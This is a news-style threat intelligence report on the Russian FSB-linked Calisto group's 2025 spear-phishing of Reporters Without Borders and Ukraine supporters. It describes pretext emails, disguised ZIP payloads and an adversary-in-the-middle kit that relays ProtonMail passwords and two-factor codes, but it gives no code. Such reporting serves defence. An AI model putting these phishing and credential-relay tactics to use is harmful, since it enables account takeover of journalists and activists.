Russian intelligence-linked cyber threat actors have intensified their operations against NATO research organizations, Western defense contractors, and NGOs supporting Ukraine, employing sophisticated phishing and credential harvesting techniques.
The Calisto intrusion set, attributed to Russia’s FSB intelligence service, has escalated its spear-phishing campaigns throughout 2025, leveraging the ClickFix malicious code technique to target high-value entities across Europe and beyond.
The Calisto group, also known as ColdRiver or Star Blizzard and formally attributed to Russia’s Center 18 for Information Security (TsIB) within the FSB, has been conducting cyber espionage operations since at least April 2017.
These campaigns have grown increasingly sophisticated, targeting military and strategic research sectors including NATO entities, Ukrainian defense contractors, NGOs, think tanks, and individuals with expertise in Russian affairs.
The intrusion set’s activities have consistently aligned with Russian strategic interests, particularly focusing on entities involved in Ukrainian support operations and intelligence infrastructure.
ClickFix Disrupts NATO’s Cybersecurity
In May and June 2025, security analysts were contacted by multiple organizations, including the prominent French NGO Reporters Without Borders (RSF), concerning suspicious spear-phishing attempts attributed to Calisto.
The organization, which has provided crucial assistance to Russian journalists fleeing persecution, became a focal point for the threat actor’s intelligence collection efforts.
Calisto’s targeting of RSF represents a significant escalation in the group’s victimology, reflecting Russia’s broader efforts to suppress international press freedom advocacy.
The phishing methodology employed by Calisto demonstrates considerable sophistication and social engineering refinement.
The group leverages ProtonMail addresses impersonating trusted contacts, initiating contact by asking recipients to review documents but deliberately withholding attachments.
When victims request the missing file, threat actors respond with malicious payloads disguised as legitimate PDF documents.
The threat actor employs PHP scripts configured with GET parameters mimicking legitimate Urchin Tracking Module (UTM) analytics parameters, using JavaScript redirection to obscure the phishing chain.
This multi-stage approach increases credibility by creating a seemingly authentic exchange before deploying malware or harvesting credentials.
One particularly notable case involved an RSF staff member receiving a deceptive email in French, with a properly formatted version of a trusted contact’s signature.
The email contained a non-functional link to trigger a follow-up response. Upon request, the attacker sent a second email containing a link redirecting to a compromised website, which in turn forwarded to a ProtonDrive URL hosting the malicious content.
In a second documented case, attackers deployed a ZIP archive disguised with a .pdf extension, further obfuscating the malicious nature of the payload.
Technical analysis of the recovered phishing kit reveals a homemade infrastructure explicitly designed to target ProtonMail accounts.
The kit employs an Adversary-in-the-Middle (AiTM) technique, injecting malicious JavaScript into the ProtonMail sign-in page while maintaining visual authenticity.
The malicious code forces the victim to focus on the password field every 250 milliseconds and communicates with an attacker-controlled API to intercept credentials and relay two-factor authentication codes.
Upon successful credential capture, analyst-controlled systems recorded access from IP address 196.44.117.196, identified as associated with Big Mama Proxy services.
Infrastructure analysis indicates Calisto’s reliance on compromised websites as redirectors, likely breached through credentials leaked by information stealers.
Domain registration patterns reveal a shift from Regway to Namecheap’s DNS infrastructure, providing medium-confidence indicators for attributing domains to Calisto operations.
Despite extensive public documentation of Calisto’s tactics and techniques, the group continues targeting Ukraine’s supporters with refined social engineering and credential harvesting operations.
Organizations involved in Ukrainian advocacy, defense research, or humanitarian efforts supporting the region face heightened risk from this persistent threat actor.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.